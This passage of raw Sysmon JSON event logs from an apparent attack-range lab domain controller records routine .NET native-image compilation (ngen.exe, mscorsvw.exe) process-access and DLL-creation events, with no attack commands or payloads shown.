08:06:34.350","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228A-5F25-0000-0010E9190F00}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7800,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:34.381\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228A-5F25-0000-0010401D0F00}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:34.381","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228A-5F25-0000-0010401D0F00}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7801,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:34.381\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228A-5F25-0000-0010401D0F00}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:34.381","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228A-5F25-0000-0010401D0F00}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7802,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:34.397\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228A-5F25-0000-0010401D0F00}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:34.397","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228A-5F25-0000-0010401D0F00}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7803,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:35.022\r\nProcessGuid: {41C8662E-228A-5F25-0000-0010401D0F00}\r\nProcessId: 2908\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b5c-0\\System.EnterpriseServices.Wrapper.dll\r\nCreationUtcTime: 2020-08-01 08:06:35.022","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:35.022","ProcessGuid":"{41C8662E-228A-5F25-0000-0010401D0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b5c-0\\System.EnterpriseServices.Wrapper.dll","CreationUtcTime":"2020-08-01 08:06:35.022","EventReceivedTime":"2020-08-01 08:06:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7804,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:35.037\r\nProcessGuid: {41C8662E-228A-5F25-0000-0010401D0F00}\r\nProcessId: 2908\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b5c-0\\System.EnterpriseServices.dll\r\nCreationUtcTime: 2020-08-01 08:06:35.037","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:35.037","ProcessGuid":"{41C8662E-228A-5F25-0000-0010401D0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b5c-0\\System.EnterpriseServices.dll","CreationUtcTime":"2020-08-01 08:06:35.037","EventReceivedTime":"2020-08-01 08:06:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7805,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:35.100\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228B-5F25-0000-001074210F00}\r\nTargetProcessId: 4520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:35.100","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228B-5F25-0000-001074210F00}","TargetProcessId":"4520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7806,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:35.100\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228B-5F25-0000-001074210F00}\r\nTargetProcessId: 4520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:35.100","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228B-5F25-0000-001074210F00}","TargetProcessId":"4520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7807,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:35.100\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228B-5F25-0000-001074210F00}\r\nTargetProcessId: 4520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:35.100","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228B-5F25-0000-001074210F00}","TargetProcessId":"4520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7808,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:35.194\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228B-5F25-0000-001059250F00}\r\nTargetProcessId: 748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:35.194","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228B-5F25-0000-001059250F00}","TargetProcessId":"748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.